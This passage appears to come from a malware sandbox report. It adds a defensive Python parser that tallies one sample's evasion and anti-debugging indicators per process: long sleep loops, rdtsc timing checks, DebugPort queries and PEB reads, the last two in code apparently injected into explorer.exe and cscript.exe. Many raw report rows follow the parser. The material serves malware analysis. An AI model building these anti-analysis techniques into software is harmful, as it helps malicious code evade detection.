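The evasion rows above (write-watch allocations, rdtsc, multi-thousand-iteration sleep loops in the injected explorer.exe and cscript.exe) and the debugger checks that follow them (DebugPort queries, reads of the PEB pointer at fs:[00000030h] in the 32-bit TEB) are more useful when aggregated per process. The following Python is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It parses rows exactly as the page renders them (Source column fused to the event text, trailing "Jump to behavior" link text) from a sample constructed by copying rows from this report. Two assumptions are built in: that the sleep figures are milliseconds despite the "s" suffix (9865 sleeps of 2000 ms is exactly the 19730000 listed for explorer.exe, and the -30000 cut-off then reads as 30 seconds), and that 922337203685477 is INT64_MAX in 100-nanosecond ticks scaled to milliseconds, i.e. the largest relative delay the kernel accepts, which is an unbounded wait rather than a real timeout.

```python
import re
from collections import defaultdict

# Keywords that open the event column of a report row. The rendered page
# drops the separator between the Source column and the event text, so the
# keyword is the only reliable boundary; an optional " | " is tolerated too.
EVENT_KINDS = (
    "Thread sleep time:", "Thread sleep count:", "Thread delayed:",
    "Memory allocated:", "Process information queried:", "Process queried:",
    "Process information set:", "Code function:", "Window / User API:",
    "API coverage:", "Binary or memory string:", "Last function:",
)
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)(?: TID: (?P<tid>\d+))?\s*\|?\s*"
    r"(?P<kind>" + "|".join(re.escape(k) for k in EVENT_KINDS) + r")\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)
# "Code function:" details repeat the function address at the end, e.g.
# "5_2_00409AB0 rdtsc 5_2_00409AB0"; split them into address and body.
FUNC_RE = re.compile(r"^(?P<addr>\S+)\s+(?P<body>.*?)\s*(?P=addr)$")
SLEEP_TIME_RE = re.compile(r"-?(\d+)s\s*>=\s*-?(\d+)s")
SLEEP_COUNT_RE = re.compile(r"(\d+)\s*>\s*(\d+)")

# Assumption: sleep figures are milliseconds despite the "s" suffix.
# INT64_MAX in 100-ns ticks, scaled to ms, is what the report prints for an
# unbounded wait (922337203685477).
INFINITE_MS = (2**63 - 1) // 10_000

# Constructed sample: rows copied verbatim from the report above.
SAMPLE = r"""
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 4320Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 4320Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2208Thread sleep count: 107 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 2208Thread sleep count: 9865 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 2208Thread sleep time: -19730000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2608Thread sleep count: 9289 > 30Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2608Thread sleep time: -18578000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
"""


def parse_row(line):
    """Split one rendered row into src, proc, tid, kind, detail (and addr
    for "Code function:" rows); None if the line is not a report row."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    row["proc"] = row["src"].replace("/", "\\").rsplit("\\", 1)[-1]
    row["tid"] = int(row["tid"]) if row["tid"] else None
    row["addr"] = None
    if row["kind"] == "Code function:":
        f = FUNC_RE.match(row["detail"])
        if f:
            row["addr"] = f.group("addr")
            row["detail"] = f.group("body").rstrip(", ")
    return row


def new_summary():
    return {"sleep_calls": 0, "sleep_ms_reported": 0, "infinite_sleep": False,
            "debugport_query": False, "rdtsc_sites": set(),
            "peb_read_sites": 0, "peb_functions": set(), "write_watch_allocs": 0}


def summarize(lines):
    """Aggregate the evasion and anti-debug indicators per process name."""
    out = defaultdict(new_summary)
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        s, kind, detail = out[row["proc"]], row["kind"], row["detail"]
        if kind == "Thread sleep time:":
            m = SLEEP_TIME_RE.search(detail)
            ms = int(m.group(1)) if m else 0
            if ms >= INFINITE_MS:
                s["infinite_sleep"] = True
            else:  # the report lists per-thread totals; keep the largest
                s["sleep_ms_reported"] = max(s["sleep_ms_reported"], ms)
        elif kind == "Thread sleep count:":
            m = SLEEP_COUNT_RE.search(detail)
            if m:  # counts are cumulative snapshots, so the max is the total
                s["sleep_calls"] = max(s["sleep_calls"], int(m.group(1)))
        elif kind == "Process queried:" and detail == "DebugPort":
            s["debugport_query"] = True
        elif kind == "Memory allocated:" and "write watch" in detail:
            s["write_watch_allocs"] += 1
        elif kind == "Code function:" and row["addr"]:
            if detail == "rdtsc":
                s["rdtsc_sites"].add(row["addr"])
            elif "fs:[00000030h]" in detail:  # TEB+0x30 holds the PEB pointer
                s["peb_read_sites"] += 1
                s["peb_functions"].add(row["addr"])
    return dict(out)


def average_sleep_ms(entry):
    """Length of one sleep in the loop, derived from total time / count."""
    if not entry["sleep_calls"]:
        return None
    return entry["sleep_ms_reported"] / entry["sleep_calls"]


if __name__ == "__main__":
    for proc, entry in summarize(SAMPLE.splitlines()).items():
        print(proc, entry, "avg sleep ms:", average_sleep_ms(entry))
```

On the sample, explorer.exe and cscript.exe each resolve to a loop of a few thousand 2000 ms sleeps, the pattern behind the "threadDelayed" and "Thread sleep count" rows, while the dropper itself shows the unbounded wait, a DebugPort query, one rdtsc site and PEB reads in two functions. The same parser accepts the rows with a " | " separator inserted, so it works on a cleaned copy of the report as well.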
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0040AA82 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_0040AA82
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01804180 mov eax, dword ptr fs:[00000030h] 5_2_01804180 (3 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01841190 mov eax, dword ptr fs:[00000030h] 5_2_01841190 (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01829194 mov eax, dword ptr fs:[00000030h] 5_2_01829194
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0183E1A4 mov eax, dword ptr fs:[00000030h] 5_2_0183E1A4 (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017FA147 mov eax, dword ptr fs:[00000030h] 5_2_017FA147 (3 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018341BB mov ecx, dword ptr fs:[00000030h] 5_2_018341BB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018341BB mov eax, dword ptr fs:[00000030h] 5_2_018341BB (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018D51B6 mov eax, dword ptr fs:[00000030h] 5_2_018D51B6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018331BE mov eax, dword ptr fs:[00000030h] 5_2_018331BE (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018101C0 mov eax, dword ptr fs:[00000030h] 5_2_018101C0 (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018151C0 mov eax, dword ptr fs:[00000030h] 5_2_018151C0 (4 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C81EE mov eax, dword ptr fs:[00000030h] 5_2_018C81EE (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h] 5_2_0182B1E0 (7 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0180A1E3 mov eax, dword ptr fs:[00000030h] 5_2_0180A1E3 (5 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018091E5 mov eax, dword ptr fs:[00000030h] 5_2_018091E5 (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h] 5_2_017FF113 (21 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018101F1 mov eax, dword ptr fs:[00000030h] 5_2_018101F1 (3 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182F1F0 mov eax, dword ptr fs:[00000030h] 5_2_0182F1F0 (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182510F mov eax, dword ptr fs:[00000030h] 5_2_0182510F (13 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0180510D mov eax, dword ptr fs:[00000030h] 5_2_0180510D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017F91F0 mov eax, dword ptr fs:[00000030h] 5_2_017F91F0 (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017F81EB mov eax, dword ptr fs:[00000030h] 5_2_017F81EB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01830118 mov eax, dword ptr fs:[00000030h] 5_2_01830118
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01837128 mov eax, dword ptr fs:[00000030h] 5_2_01837128 (2 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018BF13E mov eax, dword ptr fs:[00000030h] 5_2_018BF13E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0188A130 mov eax, dword ptr fs:[00000030h] 5_2_0188A130
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0189314A mov eax, dword ptr fs:[00000030h] 5_2_0189314A (4 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018D5149 mov eax, dword ptr fs:[00000030h] 5_2_018D5149
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018D3157 mov eax, dword ptr fs:[00000030h] 5_2_018D3157 (3 identical rows)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0183415F mov eax, dword ptr fs:[00000030h] 5_2_0183415F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0183716D mov eax, dword ptr fs:[00000030h] 5_2_0183716D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01806179 mov eax, dword ptr fs:[00000030h] 5_2_01806179
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0185717A mov eax, dword ptr fs:[00000030h]5_2_0185717A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0185717A mov eax, dword ptr fs:[00000030h]5_2_0185717A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018400A5 mov eax, dword ptr fs:[00000030h]5_2_018400A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BB0AF mov eax, dword ptr fs:[00000030h]5_2_018BB0AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D50B7 mov eax, dword ptr fs:[00000030h]5_2_018D50B7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181B0D0 mov eax, dword ptr fs:[00000030h]5_2_0181B0D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FD02D mov eax, dword ptr fs:[00000030h]5_2_017FD02D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183D0F0 mov eax, dword ptr fs:[00000030h]5_2_0183D0F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183D0F0 mov ecx, dword ptr fs:[00000030h]5_2_0183D0F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01825004 mov eax, dword ptr fs:[00000030h]5_2_01825004
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01825004 mov ecx, dword ptr fs:[00000030h]5_2_01825004
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC0F6 mov eax, dword ptr fs:[00000030h]5_2_017FC0F6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01808009 mov eax, dword ptr fs:[00000030h]5_2_01808009
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842010 mov ecx, dword ptr fs:[00000030h]5_2_01842010
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01830044 mov eax, dword ptr fs:[00000030h]5_2_01830044
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801051 mov eax, dword ptr fs:[00000030h]5_2_01801051
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801051 mov eax, dword ptr fs:[00000030h]5_2_01801051
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D505B mov eax, dword ptr fs:[00000030h]5_2_018D505B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018A9060 mov eax, dword ptr fs:[00000030h]5_2_018A9060
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FA093 mov ecx, dword ptr fs:[00000030h]5_2_017FA093
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC090 mov eax, dword ptr fs:[00000030h]5_2_017FC090
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807072 mov eax, dword ptr fs:[00000030h]5_2_01807072
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01806074 mov eax, dword ptr fs:[00000030h]5_2_01806074
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01806074 mov eax, dword ptr fs:[00000030h]5_2_01806074
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF38A mov eax, dword ptr fs:[00000030h]5_2_018BF38A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182A390 mov eax, dword ptr fs:[00000030h]5_2_0182A390
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182A390 mov eax, dword ptr fs:[00000030h]5_2_0182A390
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182A390 mov eax, dword ptr fs:[00000030h]5_2_0182A390
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018093A6 mov eax, dword ptr fs:[00000030h]5_2_018093A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018093A6 mov eax, dword ptr fs:[00000030h]5_2_018093A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187C3B0 mov eax, dword ptr fs:[00000030h]5_2_0187C3B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F8347 mov eax, dword ptr fs:[00000030h]5_2_017F8347
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F8347 mov eax, dword ptr fs:[00000030h]5_2_017F8347
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F8347 mov eax, dword ptr fs:[00000030h]5_2_017F8347
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018063CB mov eax, dword ptr fs:[00000030h]5_2_018063CB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018333D0 mov eax, dword ptr fs:[00000030h]5_2_018333D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018343D0 mov ecx, dword ptr fs:[00000030h]5_2_018343D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE328 mov eax, dword ptr fs:[00000030h]5_2_017FE328
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE328 mov eax, dword ptr fs:[00000030h]5_2_017FE328
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE328 mov eax, dword ptr fs:[00000030h]5_2_017FE328
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018843D5 mov eax, dword ptr fs:[00000030h]5_2_018843D5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F9303 mov eax, dword ptr fs:[00000030h]5_2_017F9303
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F9303 mov eax, dword ptr fs:[00000030h]5_2_017F9303
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF30A mov eax, dword ptr fs:[00000030h]5_2_018BF30A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E310 mov eax, dword ptr fs:[00000030h]5_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E310 mov eax, dword ptr fs:[00000030h]5_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E310 mov eax, dword ptr fs:[00000030h]5_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183631F mov eax, dword ptr fs:[00000030h]5_2_0183631F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01838322 mov eax, dword ptr fs:[00000030h]5_2_01838322
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01838322 mov eax, dword ptr fs:[00000030h]5_2_01838322
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01838322 mov eax, dword ptr fs:[00000030h]5_2_01838322
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182332D mov eax, dword ptr fs:[00000030h]5_2_0182332D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC3C7 mov eax, dword ptr fs:[00000030h]5_2_017FC3C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D3336 mov eax, dword ptr fs:[00000030h]5_2_018D3336
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE3C0 mov eax, dword ptr fs:[00000030h]5_2_017FE3C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE3C0 mov eax, dword ptr fs:[00000030h]5_2_017FE3C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE3C0 mov eax, dword ptr fs:[00000030h]5_2_017FE3C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A350 mov eax, dword ptr fs:[00000030h]5_2_0183A350
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182237A mov eax, dword ptr fs:[00000030h]5_2_0182237A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880371 mov eax, dword ptr fs:[00000030h]5_2_01880371
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880371 mov eax, dword ptr fs:[00000030h]5_2_01880371
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB273 mov eax, dword ptr fs:[00000030h]5_2_017FB273
